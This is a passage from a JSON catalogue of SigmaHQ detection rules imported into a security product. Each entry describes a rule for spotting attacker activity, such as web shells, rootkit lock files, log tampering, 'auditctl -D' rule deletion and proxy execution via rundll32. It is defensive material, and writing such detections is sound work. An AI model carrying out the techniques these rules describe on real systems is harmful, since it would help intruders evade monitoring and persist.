"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_eventvwr_susp_child_process.yml" } }, { "id": "sigmahq-sigma-be4d9c86-d702-4030-b52e-c7859110e5e8", "type": "detection", "name": "Activity From Anonymous IP Address", "description": "Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activity-from-anonymous-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "be4d9c86-d702-4030-b52e-c7859110e5e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml" } }, { "id": "sigmahq-sigma-be58d2e2-06c8-4f58-b666-b99f6dc3b6cd", "type": "detection", "name": "Suspicious Process Masquerading As SvcHost.EXE", "description": "Detects a suspicious process that is masquerading as the legitimate \"svchost.exe\" by naming its binary \"svchost.exe\" and executing from an uncommon location.\nAdversaries often disguise their malicious binaries by naming them after legitimate system processes like \"svchost.exe\" to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-process-masquerading-as-svchost-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "be58d2e2-06c8-4f58-b666-b99f6dc3b6cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution.yml" } }, { "id": "sigmahq-sigma-beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", "type": "detection", "name": "Potentially Suspicious EventLog Recon Activity Using Log Query Utilities", "description": "Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.\nThis technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-eventlog-recon-activity-using-log-query-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon.yml" } }, { "id": "sigmahq-sigma-bed26dea-4525-47f4-b24a-76e30e44ffb0", "type": "detection", "name": 
"Audit Rules Deleted Via Auditctl", "description": "Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.\nThis technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.\nRemoval of audit rules can significantly impair detection of malicious activities on the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audit-rules-deleted-via-auditctl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bed26dea-4525-47f4-b24a-76e30e44ffb0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_auditctl_clear_rules.yml" } }, { "id": "sigmahq-sigma-bed2a484-9348-4143-8a8a-b801c979301c", "type": "detection", "name": "Webshell Detection With Command Line Keywords", "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1018", "T1033", "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webshell-detection-with-command-line-keywords.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bed2a484-9348-4143-8a8a-b801c979301c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml" } }, { "id": "sigmahq-sigma-bed978f8-7f3a-432b-82c5-9286a9b3031a", "type": "detection", "name": "Shell Invocation via Env Command - Linux", "description": "Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-invocation-via-env-command-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bed978f8-7f3a-432b-82c5-9286a9b3031a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_env_shell_invocation.yml" } }, { "id": "sigmahq-sigma-bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "type": "detection", "name": "HackTool - SharpEvtMute Execution", "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpevtmute-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpevtmute.yml" } }, { "id": "sigmahq-sigma-bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "type": "detection", "name": "Python Initiated Connection", "description": "Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-initiated-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_python.yml" } }, { "id": "sigmahq-sigma-bef37fa2-f205-4a7b-b484-0759bfd5f86f", "type": "detection", "name": "PUA - Advanced IP Scanner Execution", "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046", "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-advanced-ip-scanner-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml" } }, { "id": "sigmahq-sigma-bf241472-f014-4f01-a869-96f99330ca8c", "type": "detection", "name": "Disk Image Mounting Via Hdiutil - MacOS", "description": "Detects the execution of the hdiutil utility in order to mount disk images.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disk-image-mounting-via-hdiutil-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf241472-f014-4f01-a869-96f99330ca8c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" } }, { "id": "sigmahq-sigma-bf344fea-d947-4ef4-9192-34d008315d3a", "type": 
"detection", "name": "Suspicious Shim Database Patching Activity", "description": "Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-shim-database-patching-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf344fea-d947-4ef4-9192-34d008315d3a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml" } }, { "id": "sigmahq-sigma-bf361876-6620-407a-812f-bfe11e51e924", "type": "detection", "name": "Compressed File Extraction Via Tar.EXE", "description": "Detects execution of \"tar.exe\" in order to extract compressed file.\nAdversaries may abuse various utilities in order to decompress data to avoid detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1560", "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/compressed-file-extraction-via-tar-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf361876-6620-407a-812f-bfe11e51e924", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tar_extraction.yml" } }, { "id": "sigmahq-sigma-bf4fc428-dcc3-4bbd-99fe-2422aeee2544", "type": "detection", "name": "ETW Logging Disabled In .NET Processes - Sysmon Registry", "description": "Detects registry modifications that stop ETW providers from recording loaded .NET assemblies, which adversaries use to blind .NET-related telemetry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-logging-disabled-in-net-processes-sysmon-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml" } }, { "id": "sigmahq-sigma-bf638ef7-4d2d-44bb-a1dc-a238252e6267", "type": "detection", "name": "Google Workspace Role Privilege Deleted", "description": "Detects when a role privilege is deleted in Google Workspace.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-role-privilege-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_role_privilege_deleted.yml" } }, { "id": "sigmahq-sigma-bf72941a-cba0-41ea-b18c-9aca3925690d", "type": "detection", "name": "PowerShell ADRecon Execution", "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-adrecon-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf72941a-cba0-41ea-b18c-9aca3925690d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" } }, { "id": "sigmahq-sigma-bf74135c-18e8-4a72-a926-0e4f47888c19", "type": "detection", "name": "DNS Events Related To Mining Pools", "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1569.002", "T1496" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-events-related-to-mining-pools.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf74135c-18e8-4a72-a926-0e4f47888c19", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dns_mining_pools.yml" } }, { "id": "sigmahq-sigma-bf9808c4-d24f-44a2-8398-b65227d406b6", "type": "detection", "name": "Potential Libvlc.DLL Sideloading", "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-libvlc-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf9808c4-d24f-44a2-8398-b65227d406b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_libvlc.yml" } }, { "id": "sigmahq-sigma-bf9e1387-b040-4393-9851-1598f8ecfae9", "type": "detection", "name": "Disable Exploit Guard Network Protection on Windows Defender", "description": "Detects disabling Windows Defender Exploit Guard Network Protection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/disable-exploit-guard-network-protection-on-windows-defender.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf9e1387-b040-4393-9851-1598f8ecfae9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" } }, { "id": "sigmahq-sigma-bfbd3291-de87-4b7c-88a2-d6a5deb28668", "type": "detection", "name": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", "description": "Detects an ADCS certificate template configuration, as recorded in the Windows Security log, that allows a risky subject permission together with a risky EKU - a misconfiguration that can be abused for certificate-based privilege escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/adcs-certificate-template-configuration-vulnerability-with-risky-eku.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" } }, { "id": "sigmahq-sigma-c0239255-822c-4630-b7f1-35362bcb8f44", "type": "detection", "name": "Triple Cross eBPF Rootkit Default LockFile", "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the 
backdoor is already running.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/triple-cross-ebpf-rootkit-default-lockfile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0239255-822c-4630-b7f1-35362bcb8f44", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml" } }, { "id": "sigmahq-sigma-c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", "type": "detection", "name": "New Service Creation Using PowerShell", "description": "Detects the creation of a new service using powershell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-service-creation-using-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_create_service.yml" } }, { "id": "sigmahq-sigma-c048f047-7e2a-4888-b302-55f509d4a91d", "type": "detection", "name": "SCR File Write Event", "description": 
"Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scr-file-write-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c048f047-7e2a-4888-b302-55f509d4a91d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_new_scr_file.yml" } }, { "id": "sigmahq-sigma-c0514f28-fdae-42df-b886-06e2b2bc5b37", "type": "detection", "name": "Service Startup Type Change Via Wmic.EXE", "description": "Detects changes to service startup type to 'disabled' or 'manual' using the WMIC command-line utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-startup-type-change-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0514f28-fdae-42df-b886-06e2b2bc5b37", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_wmic_service_startup_change.yml" } }, { "id": "sigmahq-sigma-c082c2b0-525b-4dbc-9a26-a57dc4692074", "type": "detection", "name": "DNS Query by Finger Utility", "description": "Detects DNS queries made by the finger utility, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.\nIn one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.\nSince the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.\nInvestigating such DNS queries can also help identify potential malicious infrastructure used by threat actors for command and control (C2) communication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.004", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-by-finger-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c082c2b0-525b-4dbc-9a26-a57dc4692074", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_finger.yml" } }, { "id": "sigmahq-sigma-c09dad97-1c78-4f71-b127-7edb2b8e491a", "type": "detection", "name": "Execution of Suspicious File Type Extension", "description": "Detects whether the image specified in a process creation event doesn't refer to an \".exe\" (or other known executable extension) file. 
This can be caused by process ghosting or other unorthodox methods to start a process.\nThis rule might require some initial baselining to align with some third party tooling in the user environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-of-suspicious-file-type-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" } }, { "id": "sigmahq-sigma-c0aac16a-b1e7-4330-bab0-3c27bb4987c7", "type": "detection", "name": "Remote Thread Creation In Mstsc.Exe From Suspicious Location", "description": "Detects remote thread creation in the \"mstsc.exe\" process by a process located in a potentially suspicious location.\nThis technique is often used by attackers in order to hook some APIs used by DLLs loaded by \"mstsc.exe\" during RDP authentications in order to steal credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-creation-in-mstsc-exe-from-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "c0aac16a-b1e7-4330-bab0-3c27bb4987c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml" } }, { "id": "sigmahq-sigma-c0b2768a-dd06-4671-8339-b16ca8d1f27f", "type": "detection", "name": "Potentially Suspicious NTFS Symlink Behavior Modification", "description": "Detects the modification of NTFS symbolic link behavior using fsutil, which could be used to enable remote to local or remote to remote symlinks for potential attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-ntfs-symlink-behavior-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" } }, { "id": "sigmahq-sigma-c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "type": "detection", "name": "Suspicious AgentExecutor PowerShell Execution", "description": "Detects execution of the AgentExecutor.exe binary, 
which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy \"Bypass\" or to run any binary named \"powershell.exe\" located in the path provided by the 6th positional argument", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-agentexecutor-powershell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml" } }, { "id": "sigmahq-sigma-c0d3734d-330f-4a03-aae2-65dacc6a8222", "type": "detection", "name": "Webshell Remote Command Execution", "description": "Detects possible command execution by web application/web shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webshell-remote-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0d3734d-330f-4a03-aae2-65dacc6a8222", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
